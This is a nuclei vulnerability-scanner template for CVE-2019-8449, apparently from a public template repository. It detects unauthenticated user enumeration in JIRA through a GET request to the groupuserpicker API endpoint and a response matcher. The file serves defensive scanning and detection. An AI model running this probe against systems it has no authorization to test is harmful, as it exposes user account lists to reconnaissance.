nuclei-templates/cves/2019/CVE-2019-8449.yaml

23 lines
557 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
reference: https://www.doyler.net/security-not-included/more-jira-enumeration
tags: cve,cve2019,atlassian,jira
requests:
- method: GET
path:
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2020-07-02 10:06:11 +00:00
- '{"users":{"users":'
part: body